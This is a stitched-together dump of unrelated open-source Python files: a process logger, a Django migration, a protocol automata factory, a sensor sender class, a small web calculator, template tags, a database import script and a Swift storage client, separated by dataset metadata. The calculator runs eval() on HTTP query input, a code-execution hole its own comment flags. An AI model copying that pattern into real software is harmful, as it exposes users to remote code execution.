for process in psutil.process_iter(attrs=['pid', 'name', 'cpu_percent', memory_label]):
for process_filter_string in PROCESS_FILTER:
if process_filter_string in process.info['name']:
entry = {}
entry['datetime'] = time
entry['filter'] = process_filter_string
entry['name'] = process.info['name']
entry['pid'] = process.info['pid']
entry['cpu_usage'] = process.cpu_percent(CPU_CALC_TIME)
entry['rss_memory'] = process.info[memory_label].rss
entry['vms_memory'] = process.info[memory_label].vms
filtered_processes.append(entry)
return filtered_processes
# Store new metrics in data pickle
def store(new_system_data, new_processes_data):
if not os.path.isfile(DATA_STORE_FILE):
data = {'system': [], 'processes': []}
else:
data = pickle.load(open(DATA_STORE_FILE, 'rb'))
data['system'].append(new_system_data)
data['processes'].extend(new_processes_data)
pickle.dump(data, open(DATA_STORE_FILE, 'wb'))
# Generate CSV files from data pickle
def generate_extract():
data = pickle.load(open(DATA_STORE_FILE, 'rb'))
system_data = data['system']
process_data = data['processes']
system_data_headers = ['cpu_usage', 'datetime', 'mem_available', 'mem_percent_used', 'mem_total', 'mem_used']
write_csv(system_data, system_data_headers, SYSTEM_DATA_EXTRACT_FILE)
process_data_headers = ['cpu_usage', 'datetime', 'filter', 'name', 'pid', 'rss_memory', 'vms_memory']
write_csv(process_data, process_data_headers, PROCESS_DATA_EXTRACT_FILE)
# Write CSV file from a list of dictionaries
def write_csv(data, headers, file_location):
csv_file = open(file_location, 'w+', newline='')
writer = csv.DictWriter(csv_file, headers)
writer.writeheader()
writer.writerows(data)
if __name__ == '__main__':
os_type = sys.argv[2]
if sys.argv[1] == 'log':
log_current_state(os_type)
elif sys.argv[1] == 'extract':
generate_extract()
|
apache-2.0
| -6,550,446,624,911,820,000
| 29.04
| 113
| 0.65273
| false
| 3.65628
| false
| false
| false
|
sdolemelipone/django-crypsis
|
crypsis_tests/migrations/0008_auto_20180117_1130.py
|
1
|
1097
|
# Generated by Django 2.0.1 on 2018-01-17 11:30
import crypsis.models
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('crypsis_tests', '0007_auto_20171222_1155'),
]
operations = [
migrations.AlterModelOptions(
name='orderitem',
options={'ordering': ['id'], 'verbose_name': 'Order line', 'verbose_name_plural': 'Order lines'},
),
migrations.AddField(
model_name='item',
name='desc',
field=models.CharField(default='', max_length=100),
),
migrations.AlterField(
model_name='contact',
name='xero_id',
field=models.CharField(blank=True, default='', help_text="Here you can enter the long id of the xero object to force the item it is sync'd with.", max_length=200),
),
migrations.AlterField(
model_name='order',
name='date',
field=crypsis.models.DateField(default=django.utils.timezone.now),
),
]
|
gpl-3.0
| 2,773,212,821,536,557,600
| 31.264706
| 175
| 0.58979
| false
| 4.062963
| false
| false
| false
|
dasbruns/netzob
|
src/netzob/Inference/Grammar/AutomataFactories/OneStateAutomataFactory.py
|
1
|
4587
|
# -*- coding: utf-8 -*-
#+---------------------------------------------------------------------------+
#| 01001110 01100101 01110100 01111010 01101111 01100010 |
#| |
#| Netzob : Inferring communication protocols |
#+---------------------------------------------------------------------------+
#| Copyright (C) 2011-2014 Georges Bossert and Frédéric Guihéry |
#| This program is free software: you can redistribute it and/or modify |
#| it under the terms of the GNU General Public License as published by |
#| the Free Software Foundation, either version 3 of the License, or |
#| (at your option) any later version. |
#| |
#| This program is distributed in the hope that it will be useful, |
#| but WITHOUT ANY WARRANTY; without even the implied warranty of |
#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
#| GNU General Public License for more details. |
#| |
#| You should have received a copy of the GNU General Public License |
#| along with this program. If not, see <http://www.gnu.org/licenses/>. |
#+---------------------------------------------------------------------------+
#| @url : http://www.netzob.org |
#| @contact : contact@netzob.org |
#| @sponsors : Amossys, http://www.amossys.fr |
#| Supélec, http://www.rennes.supelec.fr/ren/rd/cidre/ |
#+---------------------------------------------------------------------------+
#+----------------------------------------------
#| Standard library imports
#+----------------------------------------------
#+----------------------------------------------
#| Related third party imports
#+----------------------------------------------
#+----------------------------------------------
#| Local application imports
#+----------------------------------------------
from netzob.Common.Utils.Decorators import typeCheck, NetzobLogger
from netzob.Common.Models.Grammar.States.State import State
from netzob.Common.Models.Grammar.Transitions.Transition import Transition
from netzob.Common.Models.Grammar.Transitions.OpenChannelTransition import OpenChannelTransition
from netzob.Common.Models.Grammar.Transitions.CloseChannelTransition import CloseChannelTransition
@NetzobLogger
class OneStateAutomataFactory(object):
@staticmethod
@typeCheck(list, list)
def generate(abstractSession, symbolList):
"""Generate an automata that, according to an abstract
session, contains a main state where each request-response
couples are permitted.
"""
if len(abstractSession) < 1:
return
(client, server, symbol) = abstractSession[0] # We expect that the first message/symbol is emitted by the client.
# So we consider it as the initiator of the session.
sStart = State(name="Start state")
sMain = State(name="Main state")
sEnd = State(name="End state")
openTransition = OpenChannelTransition(startState=sStart, endState=sMain, name="Open")
it = iter(abstractSession)
inputSymbol = None
outputSymbols = None
while True:
try:
(source, destination, symbol) = it.next()
if source == client:
if symbol is not None:
inputSymbol = symbol
outputSymbols = None
else:
if symbol is not None:
outputSymbols = [symbol]
if inputSymbol is not None and outputSymbols is not None:
mainTransition = Transition(startState=sMain, endState=sMain, inputSymbol=inputSymbol, outputSymbols=outputSymbols, name="Transition")
inputSymbol = None
outputSymbols = None
except StopIteration:
break
closeTransition = CloseChannelTransition(startState=sMain, endState=sEnd, name="Close")
from netzob.Common.Models.Grammar.Automata import Automata
return Automata(sStart, symbolList)
|
gpl-3.0
| 978,344,859,303,798,100
| 51.079545
| 154
| 0.491381
| false
| 5.014223
| false
| false
| false
|
paolotozzo/SDIPy
|
sdipy/sender.py
|
1
|
7318
|
"""
sender.py
by Charles Fracchia, Copyright (c) 2013
Sender class module
This class defines data and methods for the sender in a packet
"""
import re, warnings
allowedAttributes = ["name","brand","model","modelNum"] #In future, this could be loaded dynamically from a reference JSON
class Sender(object):
"""docstring for Packet"""
def __init__(self, address, timeFormat, startTime="", **kwargs):
super(Sender, self).__init__()
if (self._validateAddress(address) != False) : #Validate submitted address
self.addressType = self._validateAddress(address)
self.address = address
if startTime != "":
if self._validateTimeFormat(timeFormat,startTime):
self.timeFormat = timeFormat
self.startTime = startTime
else:
raise ValueError("The specified time format or start time in the sender object is incorrect.")
else: #If a Start Time object was not passed
if self._validateTimeFormat(timeFormat):
self.timeFormat = timeFormat
else:
raise ValueError("The specified time format in the sender object is incorrect.")
#For each extra attribute add it to the object to expose it
for arg in kwargs:
if arg not in allowedAttributes: #If it's not an allowed attribute according to SDIP
allowedList = "" #Used for nicely formatted warning
for attribute in allowedAttributes: #For each of the attributes in the list
if allowedList != "": allowedList = allowedList + ", " + attribute #Nicely formatted :)
else: allowedList += attribute #Nicely formatted :)
warnings.warn("Invalid sender attribute passed. Attribute will not be set. Allowed attributes are: %s" % allowedList) #Warn the user
else:
setattr(self, arg, kwargs[arg]) #This sets the attribute with dynamic name
def __str__(self):
return "*********************\nSDIP Sender Object\nAddress: %s (%s)\n*********************" % (self.address,self.addressType)
def _validateAddress(self, address):
"""
Check that the [address] is a valid address and return its type
Return destination address if correct, Nothing otherwise. If it is a MAC address it will return it as a byte field (xAAxBBxCCxDDxEExFFxGGxHH)
Acceptable:
XBee MAC address formatted like AA:BB:CC:DD:EE:FF:GG:HH:GG:HH
IP address formatted like 000.000.255.255, each block has to be 0 <= n < 256
"""
pass
addressType = [] #Used for storing regex matches
mac = '^[a-fA-F0-9][aceACE02468][:|\-]?([a-fA-F0-9]{2}[:|\-]?){4}[a-fA-F0-9]{2}$' #For regular mac addresses
beemac = '^[a-fA-F0-9][aceACE02468][:|\-]?([a-fA-F0-9]{2}[:|\-]?){6}[a-fA-F0-9]{2}$' #For XBee mac addresses
ip = '(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' #For IP addresses
regexes = {"mac":mac,"beemac":beemac,"ip":ip}
for regex in regexes:
regexFound = re.compile(regexes[regex]).search(address) #Do the regex search
if regexFound != None: #If it finds a match
addressType.append("%s" % regex) #append the type to an array, this way we can detect addresses that match multiple regexes
if len(addressType) != 1: #If we matched too many regex
raise ValueError("The provided address is not correctly formatted. The address can be an IP, regular MAC address or ZigBee MAC address")
return False
else: #We correctly matched just 1 type
return addressType[0] #Return the address type matched
def _validateTimeFormat(self, timeformat, startTime=""):
"""
This validates the time format
Takes the timeformat as a string
Returns True if the timeformat is valid, False if not
"""
pass
allowedTimeFormats = ["sec","microsec","millisec"]
allowedTimeTypes = ["epoch","rel"]
splitTime = timeformat.split("-")
#print splitTime #DEBUG
if (splitTime[0] in allowedTimeFormats and splitTime[1] in allowedTimeTypes): #Check that the timeformat is correctly formatted
if splitTime[1] == "rel": #Time is relative, need to look at the start time
if startTime != "": #StartTime was passed along so we're good
if self._validateStartTime(startTime): #Time to validate the StartTime object
return True #StartTime is good
else:
raise ValueError("You indicated a relative time format but the start time object is malformed")
return False #StartTime is malformed
else: #StartTime was not passed along but time is relative grrr...
raise KeyError("You indicated a relative time format but failed to pass a start time object")
return False
elif splitTime[1] == "epoch": #Time is absolute and uses unix epoch as reference
if startTime != "":
warnings.warn("You've passed a start time dictionnary but are using absolute timing (epoch in this case). Make sure you \
understand the different types of time units we support, cause it looks like you don't :)",UserWarning)
return True
else:
raise ValueError("Your time format string is unsupported. We currently only support relative (with start time) and epoch data timestamps")
return False #Currently no other formats supported
else:
raise ValueError("Your time format string is malformed")
return False #Malformed string
def _validateStartTime(self, startTime):
"""
Validates the startTime dictionnary
Takes in a dictionnary of the following form: {"format": "sec-epoch", "time": 1383842840}
Returns True if startTime is correctly formed or False if not
"""
pass
allowedTimeFormats = ["sec","microsec","millisec"]
allowedTimeTypes = ["epoch","rel"]
try:
splitStartTime = startTime['format'].split("-")
#print splitStartTime #DEBUG
except KeyError:
raise KeyError("The start time dictionnary is malformed. It needs to be in the following form: {'format': 'sec-epoch', 'time': 1383842840}")
if (splitStartTime[0] in allowedTimeFormats and splitStartTime[1] in allowedTimeTypes): #Check that the starttime is correctly formatted
try:
if type(startTime['time']) == int:
return True
else:
return False
except KeyError:
raise KeyError("The start time dictionnary is malformed. It needs to be in the following form: {'format': 'sec-epoch', 'time': 1383842840}")
else:
return False #the startTimeFormat is not correctly formatted
|
mit
| 6,683,428,774,023,159,000
| 52.423358
| 148
| 0.595655
| false
| 4.470373
| false
| false
| false
|
tebeka/pythonwise
|
macapp/humblecalc.py
|
1
|
1479
|
#!/usr/bin/env python
# Very humble calculator, written as "Web Desktop Application"
__author__ = "Miki Tebeka <miki@mikitebeka.com>"
from __future__ import division
from math import *
from operator import isNumberType
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urlparse import urlparse
from cgi import parse_qs
import httplib
class RequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
o = urlparse(self.path)
if o.path == "/eval":
self.eval(o.query)
elif o.path == "/quit":
self.end_headers()
self.wfile.write("Bye")
self.wfile.flush()
# self.server.shutdown() hangs, so we do it the brutal way
import os; os._exit(0)
else:
SimpleHTTPRequestHandler.do_GET(self)
def eval(self, query):
q = parse_qs(query)
expr = q.get("expr", [""])[0]
try:
# FIXME: Never do this on production, this is a huge security risk
result = str(eval(expr))
except Exception, e:
result = "ERROR"
self.send_response(httplib.OK)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(result)
if __name__ == "__main__":
import webbrowser
port = 8822
server = HTTPServer(("", port), RequestHandler)
webbrowser.open("http://localhost:%s" % port)
server.serve_forever()
|
bsd-3-clause
| -1,853,744,245,115,174,100
| 29.183673
| 78
| 0.615281
| false
| 3.811856
| false
| false
| false
|
AlexStarov/Shop
|
applications/product/templatetags/block_product.py
|
1
|
1391
|
# -*- coding: utf-8 -*-
from django_jinja import library
from django.template.loader import render_to_string
__author__ = 'AlexStarov'
@library.global_function()
def block_products(products, request, ):
from django.middleware.csrf import get_token
request_csrf_token = get_token(request, )
# request_csrf_token = request.META.get(u"CSRF_COOKIE", None, )
# request_csrf_token = request.COOKIES.get(u'csrftoken', None, )
# from proj.settings import MEDIA_URL
return render_to_string(template_name=u'product/templatetags/block_products.jinja2.html',
dictionary={'products': products,
'request': request,
'csrf_token': request_csrf_token, }, )
@library.global_function()
def block_product(product, choice, cycle, last_loop, ):
if last_loop:
margin_bottom = '0px'
else:
margin_bottom = '10px'
if cycle == 1:
margin_left = '0px'
else:
margin_left = '10px'
return render_to_string(template_name=u'product/templatetags/block_product.jinja2.html',
dictionary={'product': product,
'choice': choice,
'margin_bottom': margin_bottom,
'margin_left': margin_left, }, )
|
apache-2.0
| -2,443,777,753,299,930,600
| 38.742857
| 93
| 0.561467
| false
| 4.091176
| false
| false
| false
|
maya70/GraphMirrors
|
scripts/database/setup.py
|
1
|
4731
|
#!/usr/bin/python
# Reads from mysql database into a local sqlite database.
import mysql.connector
import sqlite3
import re
# Create Tables.
target = sqlite3.connect('data.db')
tc = target.cursor()
tc.execute('CREATE TABLE components (entity_id, component_id, component_type)')
tc.execute('CREATE TABLE reactions (reaction_id INTEGER PRIMARY KEY, reaction_type TEXT, name TEXT, pathway_id, local_id TEXT)')
tc.execute('CREATE TABLE reaction_entities (reaction_id INTEGER, entity_id INTEGER, direction TEXT, PRIMARY KEY(reaction_id, entity_id))')
source = mysql.connector.connect(user = 'garba1', host = 'localhost', database = 'reactome')
sc = source.cursor()
sc.execute('SHOW TABLES')
tables = []
for (tablename,) in sc:
tables.append(tablename)
# Limit to 30 tables for testing purposes.
#tables = tables[:30]
last_completion = 0
table_count = 0
print('Components:')
# Do complex and converted after we have the source components defined.
for tablename in tables:
table_count = table_count + 1
completion = int(20 * table_count / len(tables))
if completion > last_completion:
last_completion = completion
print(' ', completion * 5, '%')
m = re.search('^(\d+)_(\w+)$', tablename)
pathway_id = int(m.group(1))
tabletype = m.group(2)
if tabletype == '6complex' or tabletype == '8convertedEntity':
component_type = None
if '6complex' == tabletype:
component_type = 'complex'
elif '8convertedEntity' == tabletype:
component_type = 'converted'
sc.execute('SELECT * FROM %s' % (tablename,))
for (local_id, name, location, reactome_id, component_local_id) in sc:
reactome_id = int(reactome_id[16:])
m = re.search('^([a-zA-Z_]+)', local_id)
tc.execute('INSERT INTO entities(entity_type, name, location, reactome_id, uniprot_id) '
'SELECT ?, ?, ?, ?, ? '
'WHERE NOT EXISTS(SELECT 1 FROM entities WHERE reactome_id=?)',
(m.group(1), name, location, reactome_id, None, reactome_id))
tc.execute('INSERT INTO entity_pathways '
'SELECT last_insert_rowid(), ?, ? '
'WHERE NOT EXISTS('
' SELECT 1 FROM entity_pathways WHERE entity_id=last_insert_rowid() AND pathway_id=?)',
(pathway_id, local_id, pathway_id))
tc.execute('INSERT INTO components '
'SELECT ?, entity_id, ? FROM entity_pathways '
'WHERE pathway_id=? AND local_id=?',
(reactome_id, component_type, pathway_id, component_local_id))
last_completion = 0
table_count = 0
print('Reactions:')
# Do reactions after all components are defined.
for tablename in tables:
table_count = table_count + 1
completion = int(20 * table_count / len(tables))
if completion > last_completion:
last_completion = completion
print(' ', completion * 5, '%')
m = re.search('^(\d+)_(\w+)$', tablename)
pathway_id = int(m.group(1))
tabletype = m.group(2)
if tabletype == '4reaction':
sc.execute('SELECT * FROM %s' % (tablename,))
for (local_id, name, local_input_id, local_output_id) in sc:
m = re.search('^([a-zA-Z_]+)', local_id)
tc.execute('INSERT INTO reactions(reaction_type, name, pathway_id, local_id) '
'SELECT ?, ?, ?, ? '
'WHERE NOT EXISTS(SELECT 1 FROM reactions WHERE pathway_id=? AND local_id=?)',
('standard', name, pathway_id, local_id, pathway_id, local_id))
tc.execute('SELECT reaction_id FROM reactions WHERE pathway_id=? and local_id=?',
(pathway_id, local_id))
reaction_id = tc.fetchone()[0]
# Each input/output pair has its own row, so we only need to grab one per loop.
tc.execute('SELECT entity_id FROM entity_pathways WHERE pathway_id=? AND local_id=?',
(pathway_id, local_input_id))
input_id = tc.fetchone()
if input_id:
input_id = input_id[0]
tc.execute('INSERT INTO reaction_entities '
'SELECT ?, ?, ? '
'WHERE NOT EXISTS(SELECT 1 FROM reaction_entities WHERE reaction_id=? AND entity_id=?)',
(reaction_id, input_id, 'input', reaction_id, input_id))
tc.execute('SELECT entity_id FROM entity_pathways WHERE pathway_id=? AND local_id=?',
(pathway_id, local_output_id))
output_id = tc.fetchone()
if output_id:
output_id = output_id[0]
tc.execute('INSERT INTO reaction_entities '
'SELECT ?, ?, ? '
'WHERE NOT EXISTS(SELECT 1 FROM reaction_entities WHERE reaction_id=? AND entity_id=?)',
(reaction_id, output_id, 'output', reaction_id, output_id))
target.commit()
|
bsd-3-clause
| -8,242,140,934,111,858,000
| 38.425
| 138
| 0.617628
| false
| 3.570566
| false
| false
| false
|
houseurmusic/my-swift
|
swift/common/client.py
|
1
|
33831
|
# Copyright (c) 2010-2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Cloud Files client library used internally
"""
import socket
from cStringIO import StringIO
from re import compile, DOTALL
from tokenize import generate_tokens, STRING, NAME, OP
from urllib import quote as _quote, unquote
from urlparse import urlparse, urlunparse
try:
from eventlet.green.httplib import HTTPException, HTTPSConnection
except ImportError:
from httplib import HTTPException, HTTPSConnection
try:
from eventlet import sleep
except ImportError:
from time import sleep
try:
from swift.common.bufferedhttp \
import BufferedHTTPConnection as HTTPConnection
except ImportError:
try:
from eventlet.green.httplib import HTTPConnection
except ImportError:
from httplib import HTTPConnection
def quote(value, safe='/'):
"""
Patched version of urllib.quote that encodes utf8 strings before quoting
"""
if isinstance(value, unicode):
value = value.encode('utf8')
return _quote(value, safe)
# look for a real json parser first
try:
# simplejson is popular and pretty good
from simplejson import loads as json_loads
except ImportError:
try:
# 2.6 will have a json module in the stdlib
from json import loads as json_loads
except ImportError:
# fall back on local parser otherwise
comments = compile(r'/\*.*\*/|//[^\r\n]*', DOTALL)
def json_loads(string):
'''
Fairly competent json parser exploiting the python tokenizer and
eval(). -- From python-cloudfiles
_loads(serialized_json) -> object
'''
try:
res = []
consts = {'true': True, 'false': False, 'null': None}
string = '(' + comments.sub('', string) + ')'
for type, val, _junk, _junk, _junk in \
generate_tokens(StringIO(string).readline):
if (type == OP and val not in '[]{}:,()-') or \
(type == NAME and val not in consts):
raise AttributeError()
elif type == STRING:
res.append('u')
res.append(val.replace('\\/', '/'))
else:
res.append(val)
return eval(''.join(res), {}, consts)
except Exception:
raise AttributeError()
class ClientException(Exception):
def __init__(self, msg, http_scheme='', http_host='', http_port='',
http_path='', http_query='', http_status=0, http_reason='',
http_device=''):
Exception.__init__(self, msg)
self.msg = msg
self.http_scheme = http_scheme
self.http_host = http_host
self.http_port = http_port
self.http_path = http_path
self.http_query = http_query
self.http_status = http_status
self.http_reason = http_reason
self.http_device = http_device
def __str__(self):
a = self.msg
b = ''
if self.http_scheme:
b += '%s://' % self.http_scheme
if self.http_host:
b += self.http_host
if self.http_port:
b += ':%s' % self.http_port
if self.http_path:
b += self.http_path
if self.http_query:
b += '?%s' % self.http_query
if self.http_status:
if b:
b = '%s %s' % (b, self.http_status)
else:
b = str(self.http_status)
if self.http_reason:
if b:
b = '%s %s' % (b, self.http_reason)
else:
b = '- %s' % self.http_reason
if self.http_device:
if b:
b = '%s: device %s' % (b, self.http_device)
else:
b = 'device %s' % self.http_device
return b and '%s: %s' % (a, b) or a
def http_connection(url, proxy=None):
"""
Make an HTTPConnection or HTTPSConnection
:param url: url to connect to
:param proxy: proxy to connect through, if any; None by default; str of the
format 'http://127.0.0.1:8888' to set one
:returns: tuple of (parsed url, connection object)
:raises ClientException: Unable to handle protocol scheme
"""
parsed = urlparse(url)
proxy_parsed = urlparse(proxy) if proxy else None
if parsed.scheme == 'http':
conn = HTTPConnection((proxy_parsed if proxy else parsed).netloc)
elif parsed.scheme == 'https':
conn = HTTPSConnection((proxy_parsed if proxy else parsed).netloc)
else:
raise ClientException('Cannot handle protocol scheme %s for url %s' %
(parsed.scheme, repr(url)))
if proxy:
conn._set_tunnel(parsed.hostname, parsed.port)
return parsed, conn
def get_auth(url, user, key, snet=False):
"""
Get authentication/authorization credentials.
The snet parameter is used for Rackspace's ServiceNet internal network
implementation. In this function, it simply adds *snet-* to the beginning
of the host name for the returned storage URL. With Rackspace Cloud Files,
use of this network path causes no bandwidth charges but requires the
client to be running on Rackspace's ServiceNet network.
:param url: authentication/authorization URL
:param user: user to authenticate as
:param key: key or password for authorization
:param snet: use SERVICENET internal network (see above), default is False
:returns: tuple of (storage URL, auth token)
:raises ClientException: HTTP GET request to auth URL failed
"""
parsed, conn = http_connection(url)
conn.request('GET', parsed.path, '',
{'X-Auth-User': user, 'X-Auth-Key': key})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Auth GET failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port,
http_path=parsed.path, http_status=resp.status,
http_reason=resp.reason)
url = resp.getheader('x-storage-url')
if snet:
parsed = list(urlparse(url))
# Second item in the list is the netloc
parsed[1] = 'snet-' + parsed[1]
url = urlunparse(parsed)
return url, resp.getheader('x-storage-token',
resp.getheader('x-auth-token'))
def get_account(url, token, marker=None, limit=None, prefix=None,
http_conn=None, full_listing=False):
"""
Get a listing of containers for the account.
:param url: storage URL
:param token: auth token
:param marker: marker query
:param limit: limit query
:param prefix: prefix query
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param full_listing: if True, return a full listing, else returns a max
of 10000 listings
:returns: a tuple of (response headers, a list of containers) The response
headers will be a dict and all header names will be lowercase.
:raises ClientException: HTTP GET request failed
"""
if not http_conn:
http_conn = http_connection(url)
if full_listing:
rv = get_account(url, token, marker, limit, prefix, http_conn)
listing = rv[1]
while listing:
marker = listing[-1]['name']
listing = \
get_account(url, token, marker, limit, prefix, http_conn)[1]
if listing:
rv[1].extend(listing)
return rv
parsed, conn = http_conn
qs = 'format=json'
if marker:
qs += '&marker=%s' % quote(marker)
if limit:
qs += '&limit=%d' % limit
if prefix:
qs += '&prefix=%s' % quote(prefix)
conn.request('GET', '%s?%s' % (parsed.path, qs), '',
{'X-Auth-Token': token})
resp = conn.getresponse()
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
if resp.status < 200 or resp.status >= 300:
resp.read()
raise ClientException('Account GET failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port,
http_path=parsed.path, http_query=qs, http_status=resp.status,
http_reason=resp.reason)
if resp.status == 204:
resp.read()
return resp_headers, []
return resp_headers, json_loads(resp.read())
def head_account(url, token, http_conn=None):
"""
Get account stats.
:param url: storage URL
:param token: auth token
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:returns: a dict containing the response's headers (all header names will
be lowercase)
:raises ClientException: HTTP HEAD request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
conn.request('HEAD', parsed.path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Account HEAD failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port,
http_path=parsed.path, http_status=resp.status,
http_reason=resp.reason)
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
return resp_headers
def post_account(url, token, headers, http_conn=None):
"""
Update an account's metadata.
:param url: storage URL
:param token: auth token
:param headers: additional headers to include in the request
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP POST request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
headers['X-Auth-Token'] = token
conn.request('POST', parsed.path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Account POST failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
def get_container(url, token, container, marker=None, limit=None,
prefix=None, delimiter=None, http_conn=None,
full_listing=False):
"""
Get a listing of objects for the container.
:param url: storage URL
:param token: auth token
:param container: container name to get a listing for
:param marker: marker query
:param limit: limit query
:param prefix: prefix query
:param delimeter: string to delimit the queries on
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param full_listing: if True, return a full listing, else returns a max
of 10000 listings
:returns: a tuple of (response headers, a list of objects) The response
headers will be a dict and all header names will be lowercase.
:raises ClientException: HTTP GET request failed
"""
if not http_conn:
http_conn = http_connection(url)
if full_listing:
rv = get_container(url, token, container, marker, limit, prefix,
delimiter, http_conn)
listing = rv[1]
while listing:
if not delimiter:
marker = listing[-1]['name']
else:
marker = listing[-1].get('name', listing[-1].get('subdir'))
listing = get_container(url, token, container, marker, limit,
prefix, delimiter, http_conn)[1]
if listing:
rv[1].extend(listing)
return rv
parsed, conn = http_conn
path = '%s/%s' % (parsed.path, quote(container))
qs = 'format=json'
if marker:
qs += '&marker=%s' % quote(marker)
if limit:
qs += '&limit=%d' % limit
if prefix:
qs += '&prefix=%s' % quote(prefix)
if delimiter:
qs += '&delimiter=%s' % quote(delimiter)
conn.request('GET', '%s?%s' % (path, qs), '', {'X-Auth-Token': token})
resp = conn.getresponse()
if resp.status < 200 or resp.status >= 300:
resp.read()
raise ClientException('Container GET failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_query=qs,
http_status=resp.status, http_reason=resp.reason)
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
if resp.status == 204:
resp.read()
return resp_headers, []
return resp_headers, json_loads(resp.read())
def head_container(url, token, container, http_conn=None):
"""
Get container stats.
:param url: storage URL
:param token: auth token
:param container: container name to get stats for
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:returns: a dict containing the response's headers (all header names will
be lowercase)
:raises ClientException: HTTP HEAD request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s' % (parsed.path, quote(container))
conn.request('HEAD', path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Container HEAD failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
return resp_headers
def put_container(url, token, container, headers=None, http_conn=None):
"""
Create a container
:param url: storage URL
:param token: auth token
:param container: container name to create
:param headers: additional headers to include in the request
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP PUT request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s' % (parsed.path, quote(container))
if not headers:
headers = {}
headers['X-Auth-Token'] = token
conn.request('PUT', path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Container PUT failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
def post_container(url, token, container, headers, http_conn=None):
"""
Update a container's metadata.
:param url: storage URL
:param token: auth token
:param container: container name to update
:param headers: additional headers to include in the request
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP POST request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s' % (parsed.path, quote(container))
headers['X-Auth-Token'] = token
conn.request('POST', path, '', headers)
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Container POST failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
def delete_container(url, token, container, http_conn=None):
"""
Delete a container
:param url: storage URL
:param token: auth token
:param container: container name to delete
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:raises ClientException: HTTP DELETE request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s' % (parsed.path, quote(container))
conn.request('DELETE', path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
resp.read()
if resp.status < 200 or resp.status >= 300:
raise ClientException('Container DELETE failed',
http_scheme=parsed.scheme, http_host=conn.host,
http_port=conn.port, http_path=path, http_status=resp.status,
http_reason=resp.reason)
def get_object(url, token, container, name, http_conn=None,
resp_chunk_size=None):
"""
Get an object
:param url: storage URL
:param token: auth token
:param container: container name that the object is in
:param name: object name to get
:param http_conn: HTTP connection object (If None, it will create the
conn object)
:param resp_chunk_size: if defined, chunk size of data to read. NOTE: If
you specify a resp_chunk_size you must fully read
the object's contents before making another
request.
:returns: a tuple of (response headers, the object's contents) The response
headers will be a dict and all header names will be lowercase.
:raises ClientException: HTTP GET request failed
"""
if http_conn:
parsed, conn = http_conn
else:
parsed, conn = http_connection(url)
path = '%s/%s/%s' % (parsed.path, quote(container), quote(name))
conn.request('GET', path, '', {'X-Auth-Token': token})
resp = conn.getresponse()
if resp.status < 200 or resp.status >= 300:
resp.read()
raise ClientException('Object GET failed', http_scheme=parsed.scheme,
http_host=conn.host, http_port=conn.port, http_path=path,
http_status=resp.status, http_reason=resp.reason)
if resp_chunk_size:
def _object_body():
buf = resp.read(resp_chunk_size)
while buf:
yield buf
buf = resp.read(resp_chunk_size)
object_body = _object_body()
else:
object_body = resp.read()
resp_headers = {}
for header, value in resp.getheaders():
resp_headers[header.lower()] = value
return resp_headers, object_body
